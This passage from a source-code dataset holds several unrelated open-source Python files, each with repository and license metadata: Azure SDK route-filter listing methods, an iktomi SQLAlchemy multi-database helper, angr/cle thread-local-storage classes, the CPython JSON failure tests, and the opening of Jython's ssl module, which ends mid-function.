        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of RouteFilter
        :rtype:
         ~azure.mgmt.network.v2017_08_01.models.RouteFilterPaged[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def internal_paging(next_link=None, raw=False):
            # Fetch one page; next_link is the continuation URL returned by
            # the service for subsequent pages.
            if not next_link:
                # Construct URL
                url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters'
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        deserialized = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies)

        if raw:
            header_dict = {}
            client_raw_response = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response

        return deserialized

    def list(
            self, custom_headers=None, raw=False, **operation_config):
        """Gets all route filters in a subscription.

        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of RouteFilter
        :rtype:
         ~azure.mgmt.network.v2017_08_01.models.RouteFilterPaged[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def internal_paging(next_link=None, raw=False):
            # Fetch one page; next_link is the continuation URL returned by
            # the service for subsequent pages.
            if not next_link:
                # Construct URL
                url = '/subscriptions/{subscriptionId}/providers/Microsoft.Network/routeFilters'
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        deserialized = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies)

        if raw:
            header_dict = {}
            client_raw_response = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response

        return deserialized
| mit |
SlivTime/iktomi | iktomi/db/sqla/__init__.py | 3 | 1389 | # -*- coding: utf-8 -*-
import six
import logging
from importlib import import_module
from sqlalchemy import create_engine
def multidb_binds(databases, package=None, engine_params=None):
'''Creates dictionary to be passed as `binds` parameter to
`sqlalchemy.orm.sessionmaker()` from dictionary mapping models module name
to connection URI that should be used for these models. Models module must
have `metadata` attribute. `package` when set must be a package or package
name for all models modules.'''
engine_params = engine_params or {}
if not (package is None or isinstance(package, six.string_types)):
package = getattr(package, '__package__', None) or package.__name__
binds = {}
for ref, uri in databases.items():
md_ref = '.'.join(filter(None, [package, ref]))
md_module = import_module(md_ref)
try:
metadata = md_module.metadata
except AttributeError:
raise ImportError(
'Cannot import name metadata from module {}'.format(md_ref))
engine = create_engine(uri, **engine_params)
# Dot before [name] is required to allow setting logging level etc. for
# all them at once.
engine.logger = logging.getLogger('sqlalchemy.engine.[%s]' % ref)
for table in metadata.sorted_tables:
binds[table] = engine
return binds
| mit |
angr/cle | cle/backends/tls/__init__.py | 1 | 1904 | from ..relocation import Relocation
from ...errors import CLEError
from .. import Backend
class ThreadManager:
"""
This class tracks what data is thread-local and can generate thread initialization images
Most of the heavy lifting will be handled in a subclass
"""
def __init__(self, loader, arch, max_modules=256):
self.loader = loader
self.arch = arch
self.max_modules = max_modules
self.modules = []
self.threads = []
def register_object(self, obj):
if not obj.tls_used:
return False
if len(self.modules) >= self.max_modules:
raise CLEError("Too many loaded modules for TLS to handle... file this as a bug")
obj.tls_module_id = len(self.modules)
self.modules.append(obj)
return True
@staticmethod
def initialization_image(obj):
return obj.memory.load(obj.tls_data_start, obj.tls_data_size).ljust(obj.tls_block_size, b'\0')
def new_thread(self, insert=True):
thread = self._thread_cls(self)
if insert:
self.loader._internal_load(thread)
self.threads.append(thread)
return thread
@property
def _thread_cls(self):
raise NotImplementedError("This platform doesn't have an implementation of thread-local storage")
class InternalTLSRelocation(Relocation):
AUTO_HANDLE_NONE = True
def __init__(self, val, offset, owner):
super().__init__(owner, None, offset)
self.val = val
@property
def value(self):
return self.val + self.owner.mapped_base
class TLSObject(Backend):
def __init__(self, loader, arch):
super().__init__('cle##tls', None, loader=loader, arch=arch)
from .elf_tls import ELFThreadManager
from .elfcore_tls import ELFCoreThreadManager
from .pe_tls import PEThreadManager
from .minidump_tls import MinidumpThreadManager
| bsd-2-clause |
2015fallproject/2015fallcase2 | static/Brython3.2.0-20150701-214155/Lib/test/unittests/test_json/test_fail.py | 29 | 3910 | from test.test_json import PyTest, CTest
# 2007-10-05
JSONDOCS = [
# http://json.org/JSON_checker/test/fail1.json
'"A JSON payload should be an object or array, not a string."',
# http://json.org/JSON_checker/test/fail2.json
'["Unclosed array"',
# http://json.org/JSON_checker/test/fail3.json
'{unquoted_key: "keys must be quoted"}',
# http://json.org/JSON_checker/test/fail4.json
'["extra comma",]',
# http://json.org/JSON_checker/test/fail5.json
'["double extra comma",,]',
# http://json.org/JSON_checker/test/fail6.json
'[ , "<-- missing value"]',
# http://json.org/JSON_checker/test/fail7.json
'["Comma after the close"],',
# http://json.org/JSON_checker/test/fail8.json
'["Extra close"]]',
# http://json.org/JSON_checker/test/fail9.json
'{"Extra comma": true,}',
# http://json.org/JSON_checker/test/fail10.json
'{"Extra value after close": true} "misplaced quoted value"',
# http://json.org/JSON_checker/test/fail11.json
'{"Illegal expression": 1 + 2}',
# http://json.org/JSON_checker/test/fail12.json
'{"Illegal invocation": alert()}',
# http://json.org/JSON_checker/test/fail13.json
'{"Numbers cannot have leading zeroes": 013}',
# http://json.org/JSON_checker/test/fail14.json
'{"Numbers cannot be hex": 0x14}',
# http://json.org/JSON_checker/test/fail15.json
'["Illegal backslash escape: \\x15"]',
# http://json.org/JSON_checker/test/fail16.json
'[\\naked]',
# http://json.org/JSON_checker/test/fail17.json
'["Illegal backslash escape: \\017"]',
# http://json.org/JSON_checker/test/fail18.json
'[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]',
# http://json.org/JSON_checker/test/fail19.json
'{"Missing colon" null}',
# http://json.org/JSON_checker/test/fail20.json
'{"Double colon":: null}',
# http://json.org/JSON_checker/test/fail21.json
'{"Comma instead of colon", null}',
# http://json.org/JSON_checker/test/fail22.json
'["Colon instead of comma": false]',
# http://json.org/JSON_checker/test/fail23.json
'["Bad value", truth]',
# http://json.org/JSON_checker/test/fail24.json
"['single quote']",
# http://json.org/JSON_checker/test/fail25.json
'["\ttab\tcharacter\tin\tstring\t"]',
# http://json.org/JSON_checker/test/fail26.json
'["tab\\ character\\ in\\ string\\ "]',
# http://json.org/JSON_checker/test/fail27.json
'["line\nbreak"]',
# http://json.org/JSON_checker/test/fail28.json
'["line\\\nbreak"]',
# http://json.org/JSON_checker/test/fail29.json
'[0e]',
# http://json.org/JSON_checker/test/fail30.json
'[0e+]',
# http://json.org/JSON_checker/test/fail31.json
'[0e+-1]',
# http://json.org/JSON_checker/test/fail32.json
'{"Comma instead if closing brace": true,',
# http://json.org/JSON_checker/test/fail33.json
'["mismatch"}',
# http://code.google.com/p/simplejson/issues/detail?id=3
'["A\u001FZ control characters in string"]',
]
SKIPS = {
1: "why not have a string payload?",
18: "spec doesn't specify any nesting limitations",
}
class TestFail:
def test_failures(self):
for idx, doc in enumerate(JSONDOCS):
idx = idx + 1
if idx in SKIPS:
self.loads(doc)
continue
try:
self.loads(doc)
except ValueError:
pass
else:
self.fail("Expected failure for fail{0}.json: {1!r}".format(idx, doc))
def test_non_string_keys_dict(self):
data = {'a' : 1, (1, 2) : 2}
#This is for c encoder
self.assertRaises(TypeError, self.dumps, data)
#This is for python encoder
self.assertRaises(TypeError, self.dumps, data, indent=True)
class TestPyFail(TestFail, PyTest): pass
class TestCFail(TestFail, CTest): pass
| agpl-3.0 |
thomashaw/SecGen | modules/utilities/unix/audit_tools/ghidra/files/release/Ghidra/Features/Python/data/jython-2.7.1/Lib/ssl.py | 6 | 49205 | import base64
from collections import namedtuple
import errno
from java.security.cert import CertificateFactory
import uuid
from java.io import BufferedInputStream
from java.security import KeyStore, KeyStoreException
from java.security.cert import CertificateParsingException
from javax.naming.ldap import LdapName
from java.lang import IllegalArgumentException, System
import logging
import os
import textwrap
import time
import re
import threading
try:
# jarjar-ed version
from org.python.netty.channel import ChannelInitializer
from org.python.netty.handler.ssl import SslHandler, SslProvider, SslContextBuilder, ClientAuth
from org.python.netty.handler.ssl.util import SimpleTrustManagerFactory, InsecureTrustManagerFactory
from org.python.netty.buffer import ByteBufAllocator
except ImportError:
# dev version from extlibs
from io.netty.channel import ChannelInitializer
from io.netty.handler.ssl import SslHandler, SslProvider, SslContextBuilder, ClientAuth
from io.netty.handler.ssl.util import SimpleTrustManagerFactory, InsecureTrustManagerFactory
from io.netty.buffer import ByteBufAllocator
from _socket import (
SSLError, raises_java_exception,
SSL_ERROR_SSL,
SSL_ERROR_WANT_READ,
SSL_ERROR_WANT_WRITE,
SSL_ERROR_WANT_X509_LOOKUP,
SSL_ERROR_SYSCALL,
SSL_ERROR_ZERO_RETURN,
SSL_ERROR_WANT_CONNECT,
SSL_ERROR_EOF,
SSL_ERROR_INVALID_ERROR_CODE,
SOL_SOCKET,
SO_TYPE,
SOCK_STREAM,
socket,
_socketobject,
ChildSocket,
error as socket_error)
from _sslcerts import _get_openssl_key_manager, _extract_cert_from_data, _extract_certs_for_paths, \
_str_hash_key_entry, _get_ecdh_parameter_spec, CompositeX509TrustManagerFactory
from _sslcerts import SSLContext as _JavaSSLContext
from java.text import SimpleDateFormat
from java.util import ArrayList, Locale, TimeZone, NoSuchElementException
from java.util.concurrent import CountDownLatch
from javax.naming.ldap import LdapName
from javax.net.ssl import SSLException, SSLHandshakeException
from javax.security.auth.x500 import X500Principal
from org.ietf.jgss import Oid
try:
# requires Java 8 or higher for this support
from javax.net.ssl import SNIHostName, SNIMatcher
HAS_SNI = True
except ImportError:
HAS_SNI = False
log = logging.getLogger("_socket")
# Pretend to be OpenSSL
OPENSSL_VERSION = "OpenSSL 1.0.0 (as emulated by Java SSL)"
OPENSSL_VERSION_NUMBER = 0x1000000L
OPENSSL_VERSION_INFO = (1, 0, 0, 0, 0)
_OPENSSL_API_VERSION = OPENSSL_VERSION_INFO
CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED = range(3)
_CERT_TO_CLIENT_AUTH = {CERT_NONE: ClientAuth.NONE,
CERT_OPTIONAL: ClientAuth.OPTIONAL,
CERT_REQUIRED: ClientAuth.REQUIRE}
# Do not support PROTOCOL_SSLv2, it is highly insecure and it is optional
_, PROTOCOL_SSLv3, PROTOCOL_SSLv23, PROTOCOL_TLSv1, PROTOCOL_TLSv1_1, PROTOCOL_TLSv1_2 = range(6)
_PROTOCOL_NAMES = {
PROTOCOL_SSLv3: 'SSLv3',
PROTOCOL_SSLv23: 'SSLv23',
PROTOCOL_TLSv1: 'TLSv1',
PROTOCOL_TLSv1_1: 'TLSv1.1',
PROTOCOL_TLSv1_2: 'TLSv1.2'
}
OP_ALL, OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_TLSv1 = range(4)
OP_SINGLE_DH_USE, OP_NO_COMPRESSION, OP_CIPHER_SERVER_PREFERENCE, OP_SINGLE_ECDH_USE = 1048576, 131072, 4194304, 524288
VERIFY_DEFAULT, VERIFY_CRL_CHECK_LEAF, VERIFY_CRL_CHECK_CHAIN, VERIFY_X509_STRICT = 0, 4, 12, 32
CHANNEL_BINDING_TYPES = []
# https://docs.python.org/2/library/ssl.html#ssl.HAS_ALPN etc...
HAS_ALPN, HAS_NPN, HAS_ECDH = False, False, True
# TODO not supported on jython yet
# Disable weak or insecure ciphers by default
# (OpenSSL's default setting is 'DEFAULT:!aNULL:!eNULL')
# Enable a better set of ciphers by default
# This list has been explicitly chosen to:
# * Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE)
# * Prefer ECDHE over DHE for better performance
# * Prefer any AES-GCM over any AES-CBC for better performance and security
# * Then Use HIGH cipher suites as a fallback
# * Then Use 3DES as fallback which is secure but slow
# * Disable NULL authentication, NULL encryption, and MD5 MACs for security
# reasons
_DEFAULT_CIPHERS = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5'
)
# TODO not supported on jython yet
# Restricted and more secure ciphers for the server side
# This list has been explicitly chosen to:
# * Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE)
# * Prefer ECDHE over DHE for better performance
# * Prefer any AES-GCM over any AES-CBC for better performance and security
# * Then Use HIGH cipher suites as a fallback
# * Then Use 3DES as fallback which is secure but slow
# * Disable NULL authentication, NULL encryption, MD5 MACs, DSS, and RC4 for
# security reasons
_RESTRICTED_SERVER_CIPHERS = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5:!DSS:!RC4'
)
_rfc2822_date_format = SimpleDateFormat("MMM dd HH:mm:ss yyyy z", Locale.US)
_rfc2822_date_format.setTimeZone(TimeZone.getTimeZone("GMT"))
_ldap_rdn_display_names = {
# list from RFC 2253
"CN": "commonName",
"E": "emailAddress",
"L": "localityName",
"ST": "stateOrProvinceName",
"O": "organizationName",
"OU": "organizationalUnitName",
"C": "countryName",
"STREET": "streetAddress",
"DC": "domainComponent",
"UID": "userid"
}
_cert_name_types = [
# Fields documented in
# http://docs.oracle.com/javase/7/docs/api/java/security/cert/X509Certificate.html#getSubjectAlternativeNames()
"other",
"rfc822",
"DNS",
"x400Address",
"directory",
"ediParty",
"uniformResourceIdentifier",
"ipAddress",
"registeredID"]
def _str_or_unicode(s):
try:
return s.encode('ascii')
except UnicodeEncodeError:
return s
except AttributeError:
return str(s)
class CertificateError(ValueError):
pass
# TODO for now create these exceptions here to conform with API
class SSLZeroReturnError(SSLError):
pass
class SSLWantReadError(SSLError):
pass
class SSLWantWriteError(SSLError):
pass
class SSLSyscallError(SSLError):
pass
class SSLEOFError(SSLError):
pass
def _dnsname_match(dn, hostname, max_wildcards=1):
"""Matching according to RFC 6125, section 6.4.3
http://tools.ietf.org/html/rfc6125#section-6.4.3
"""
pats = []
if not dn:
return False
pieces = dn.split(r'.')
leftmost = pieces[0]
remainder = pieces[1:]
wildcards = leftmost.count('*')
if wildcards > max_wildcards:
# Issue #17980: avoid denials of service by refusing more
# than one wildcard per fragment. A survery of established
# policy among SSL implementations showed it to be a
# reasonable choice.
raise CertificateError(
"too many wildcards in certificate DNS name: " + repr(dn))
# speed up common case w/o wildcards
if not wildcards:
return dn.lower() == hostname.lower()
# RFC 6125, section 6.4.3, subitem 1.
# The client SHOULD NOT attempt to match a presented identifier in which
# the wildcard character comprises a label other than the left-most label.
if leftmost == '*':
# When '*' is a fragment by itself, it matches a non-empty dotless
# fragment.
pats.append('[^.]+')
elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
# RFC 6125, section 6.4.3, subitem 3.
# The client SHOULD NOT attempt to match a presented identifier
# where the wildcard character is embedded within an A-label or
# U-label of an internationalized domain name.
pats.append(re.escape(leftmost))
else:
# Otherwise, '*' matches any dotless string, e.g. www*
pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
# add the remaining fragments, ignore any wildcards
for frag in remainder:
pats.append(re.escape(frag))
pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
return pat.match(hostname)
def match_hostname(cert, hostname):
"""Verify that *cert* (in decoded format as returned by
SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125
rules are followed, but IP addresses are not accepted for *hostname*.
CertificateError is raised on failure. On success, the function
returns nothing.
"""
if not cert:
raise ValueError("empty or no certificate, match_hostname needs a "
"SSL socket or SSL context with either "
"CERT_OPTIONAL or CERT_REQUIRED")
dnsnames = []
san = cert.get('subjectAltName', ())
for key, value in san:
if key == 'DNS':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if not dnsnames:
# The subject is only checked when there is no dNSName entry
# in subjectAltName
for sub in cert.get('subject', ()):
for key, value in sub:
# XXX according to RFC 2818, the most specific Common Name
# must be used.
if key == 'commonName':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if len(dnsnames) > 1:
raise CertificateError("hostname %r "
"doesn't match either of %s"
% (hostname, ', '.join(map(repr, dnsnames))))
elif len(dnsnames) == 1:
raise CertificateError("hostname %r "
"doesn't match %r"
% (hostname, dnsnames[0]))
else:
raise CertificateError("no appropriate commonName or "
"subjectAltName fields were found")
DefaultVerifyPaths = namedtuple("DefaultVerifyPaths",
"cafile capath openssl_cafile_env openssl_cafile openssl_capath_env "
"openssl_capath")
def get_default_verify_paths():
"""Return paths to default cafile and capath.
"""
cafile, capath = None, None
default_cert_dir_env = os.environ.get('SSL_CERT_DIR', None)
default_cert_file_env = os.environ.get('SSL_CERT_FILE', None)
java_cert_file = System.getProperty('javax.net.ssl.trustStore')
if java_cert_file is not None and os.path.isfile(java_cert_file):
cafile = java_cert_file
else:
if default_cert_dir_env is not None:
capath = default_cert_dir_env if os.path.isdir(default_cert_dir_env) else None
if default_cert_file_env is not None:
cafile = default_cert_file_env if os.path.isfile(default_cert_file_env) else None
if cafile is None:
# http://docs.oracle.com/javase/6/docs/technotes/guides/security/jsse/JSSERefGuide.html
java_home = System.getProperty('java.home')
for _path in ('lib/security/jssecacerts', 'lib/security/cacerts'):
java_cert_file = os.path.join(java_home, _path)
if os.path.isfile(java_cert_file):
cafile = java_cert_file
capath = os.path.dirname(cafile)
return DefaultVerifyPaths(cafile if os.path.isfile(cafile) else None,
capath if capath and os.path.isdir(capath) else None,
'SSL_CERT_FILE', default_cert_file_env,
'SSL_CERT_DIR', default_cert_dir_env)
class _ASN1Object(namedtuple("_ASN1Object", "nid shortname longname oid")):
"""ASN.1 object identifier lookup
"""
__slots__ = ()
def __new__(cls, oid):
# TODO, just fake it for now
if oid == '1.3.6.1.5.5.7.3.1':
return super(_ASN1Object, cls).__new__(cls, 129, 'serverAuth', 'TLS Web Server Authentication', oid)
elif oid == '1.3.6.1.5.5.7.3.2':
return super(_ASN1Object, cls).__new__(cls, 130, 'clientAuth', 'clientAuth', oid)
raise ValueError()
class Purpose(_ASN1Object):
"""SSLContext purpose flags with X509v3 Extended Key Usage objects
"""
Purpose.SERVER_AUTH = Purpose('1.3.6.1.5.5.7.3.1')
Purpose.CLIENT_AUTH = Purpose('1.3.6.1.5.5.7.3.2')
def create_default_context(purpose=Purpose.SERVER_AUTH, cafile=None,
capath=None, cadata=None):
"""Create a SSLContext object with default settings.
NOTE: The protocol and settings may change anytime without prior
deprecation. The values represent a fair balance between maximum
compatibility and security.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(PROTOCOL_SSLv23)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
# disable compression to prevent CRIME attacks (OpenSSL 1.0+)
# TODO not supported on Jython
# context.options |= getattr(_ssl, "OP_NO_COMPRESSION", 0)
if purpose == Purpose.SERVER_AUTH:
# verify certs and host name in client mode
context.verify_mode = CERT_REQUIRED
context.check_hostname = True
elif purpose == Purpose.CLIENT_AUTH:
pass
# TODO commeted out by darjus, none of the below is supported :(
# # Prefer the server's ciphers by default so that we get stronger
# # encryption
# context.options |= getattr(_ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
#
# # Use single use keys in order to improve forward secrecy
# context.options |= getattr(_ssl, "OP_SINGLE_DH_USE", 0)
# context.options |= getattr(_ssl, "OP_SINGLE_ECDH_USE", 0)
#
# # disallow ciphers with known vulnerabilities
# context.set_ciphers(_RESTRICTED_SERVER_CIPHERS)
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
def _create_unverified_context(protocol=PROTOCOL_SSLv23, cert_reqs=None,
check_hostname=False, purpose=Purpose.SERVER_AUTH,
certfile=None, keyfile=None,
cafile=None, capath=None, cadata=None):
"""Create a SSLContext object for Python stdlib modules
All Python stdlib modules shall use this function to create SSLContext
objects in order to keep common settings in one place. The configuration
is less restricted than create_default_context()'s to increase backward
compatibility.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(protocol)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
if cert_reqs is not None:
context.verify_mode = cert_reqs
context.check_hostname = check_hostname
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile or keyfile:
context.load_cert_chain(certfile, keyfile)
# load CA root certs
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
# Used by http.client if no context is explicitly passed.
_create_default_https_context = create_default_context
# Backwards compatibility alias, even though it's not a public name.
_create_stdlib_context = _create_unverified_context
class SSLInitializer(ChannelInitializer):
def __init__(self, ssl_handler):
self.ssl_handler = ssl_handler
def initChannel(self, ch):
pipeline = ch.pipeline()
pipeline.addFirst("ssl", self.ssl_handler)
class SSLSocket(object):
def __init__(self, sock, keyfile=None, certfile=None, server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True, suppress_ragged_eofs=True, npn_protocols=None, ciphers=None,
server_hostname=None, _context=None):
# TODO ^^ handle suppress_ragged_eofs
self.sock = sock
self.do_handshake_on_connect = do_handshake_on_connect
self._sock = sock._sock # the real underlying socket
# FIXME in CPython, a check like so is performed - but this is
# not quite correct, based on tests. We should revisit to see
# if we can make this work as desired.
# if do_handshake_on_connect and self._sock.timeout == 0:
# raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
self._connected = False
if _context:
self._context = _context
else:
if server_side and not certfile:
raise ValueError("certfile must be specified for server-side "
"operations")
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile and not keyfile:
keyfile = certfile
self._context = SSLContext(ssl_version)
self._context.verify_mode = cert_reqs
if ca_certs:
self._context.load_verify_locations(ca_certs)
if certfile:
self._context.load_cert_chain(certfile, keyfile)
if npn_protocols:
self._context.set_npn_protocols(npn_protocols)
if ciphers:
self._context.set_ciphers(ciphers)
self.keyfile = keyfile
self.certfile = certfile
self.cert_reqs = cert_reqs
self.ssl_version = ssl_version
self.ca_certs = ca_certs
self.ciphers = ciphers
if sock.getsockopt(SOL_SOCKET, SO_TYPE) != SOCK_STREAM:
raise NotImplementedError("only stream sockets are supported")
if server_side and server_hostname:
raise ValueError("server_hostname can only be specified "
"in client mode")
if self._context.check_hostname and not server_hostname:
raise ValueError("check_hostname requires server_hostname")
self.server_side = server_side
self.server_hostname = server_hostname
self.suppress_ragged_eofs = suppress_ragged_eofs
self.ssl_handler = None
# We use _sslobj here to support the CPython convention that
# an object means we have handshaked. It is used by existing code
# in the wild that looks at this ostensibly internal attribute.
# FIXME CPython uses _sslobj to track the OpenSSL wrapper
# object that's implemented in C, with the following
# properties:
#
# 'cipher', 'compression', 'context', 'do_handshake',
# 'peer_certificate', 'pending', 'read', 'shutdown',
# 'tls_unique_cb', 'version', 'write'
self._sslobj = self # setting to self is not quite right
self.engine = None
if self.do_handshake_on_connect and self._sock.connected:
log.debug("Handshaking socket on connect", extra={"sock": self._sock})
if isinstance(self._sock, ChildSocket):
# Need to handle child sockets differently depending
# on whether the parent socket is wrapped or not.
#
# In either case, we cannot handshake here in this
# thread - it must be done in the child pool and
# before the child is activated.
#
# 1. If wrapped, this is going through SSLSocket.accept
if isinstance(self._sock.parent_socket, SSLSocket):
# already wrapped, via `wrap_child` function a few lines below
log.debug(
"Child socket - will handshake in child loop type=%s parent=%s",
type(self._sock), self._sock.parent_socket,
extra={"sock": self._sock})
self._sock._make_active()
# 2. If not, using code will be calling SSLContext.wrap_socket
# *after* accept from an unwrapped socket
else:
log.debug("Child socket will wrap self with handshake", extra={"sock": self._sock})
setup_handshake_latch = CountDownLatch(1)
def setup_handshake():
handshake_future = self.do_handshake()
setup_handshake_latch.countDown()
return handshake_future
self._sock.ssl_wrap_self = setup_handshake
self._sock._make_active()
setup_handshake_latch.await()
log.debug("Child socket waiting on handshake=%s", self._handshake_future, extra={"sock": self._sock})
self._sock._handle_channel_future(self._handshake_future, "SSL handshake")
else:
self.do_handshake()
if hasattr(self._sock, "accepted_children"):
def wrap_child(child):
log.debug(
"Wrapping child socket - about to handshake! parent=%s",
self._sock, extra={"sock": child})
child._wrapper_socket = self.context.wrap_socket(
_socketobject(_sock=child),
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs,
server_side=True)
if self.do_handshake_on_connect:
# this handshake will be done in the child pool - initChannel will block on it
child._wrapper_socket.do_handshake()
self._sock.ssl_wrap_child_socket = wrap_child
@property
def context(self):
return self._context
@context.setter
def context(self, context):
self._context = context
def setup_engine(self, addr):
if self.engine is None:
# http://stackoverflow.com/questions/13390964/java-ssl-fatal-error-80-unwrapping-net-record-after-adding-the-https-en
self.engine = self._context._createSSLEngine(
addr, self.server_hostname,
cert_file=getattr(self, "certfile", None), key_file=getattr(self, "keyfile", None),
server_side=self.server_side)
self.engine.setUseClientMode(not self.server_side)
def connect(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
if self.server_side:
raise ValueError("can't connect in server-side mode")
if self._connected:
raise ValueError("attempt to connect already-connected SSLSocket!")
log.debug("Connect SSL with handshaking %s", self.do_handshake_on_connect, extra={"sock": self._sock})
self._sock.connect(addr)
if self.do_handshake_on_connect:
self.do_handshake()
def connect_ex(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
if self.server_side:
raise ValueError("can't connect in server-side mode")
if self._connected:
raise ValueError("attempt to connect already-connected SSLSocket!")
log.debug("Connect SSL with handshaking %s", self.do_handshake_on_connect, extra={"sock": self._sock})
rc = self._sock.connect_ex(addr)
if rc == errno.EISCONN:
self._connected = True
if self.do_handshake_on_connect:
self.do_handshake()
return rc
def accept(self):
"""Accepts a new connection from a remote client, and returns
a tuple containing that new connection wrapped with a server-side
SSL channel, and the address of the remote client."""
child, addr = self._sock.accept()
if self.do_handshake_on_connect:
wrapped_child_socket = child._wrapper_socket
del child._wrapper_socket
return wrapped_child_socket, addr
else:
return self.context.wrap_socket(
_socketobject(_sock=child),
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs,
server_side=True)
def unwrap(self):
try:
self._sock.channel.pipeline().remove("ssl")
except NoSuchElementException:
pass
self.ssl_handler.close()
return self._sock
def do_handshake(self):
log.debug("SSL handshaking", extra={"sock": self._sock})
self.setup_engine(self.sock.getpeername())
def handshake_step(result):
log.debug("SSL handshaking completed %s", result, extra={"sock": self._sock})
self._notify_selectors()
if self.ssl_handler is None:
self.ssl_handler = SslHandler(self.engine)
self.ssl_handler.handshakeFuture().addListener(handshake_step)
if hasattr(self._sock, "connected") and self._sock.connected:
# The underlying socket is already connected, so some extra work to manage
log.debug("Adding SSL handler to pipeline after connection", extra={"sock": self._sock})
self._sock.channel.pipeline().addFirst("ssl", self.ssl_handler)
else:
log.debug("Not connected, adding SSL initializer...", extra={"sock": self._sock})
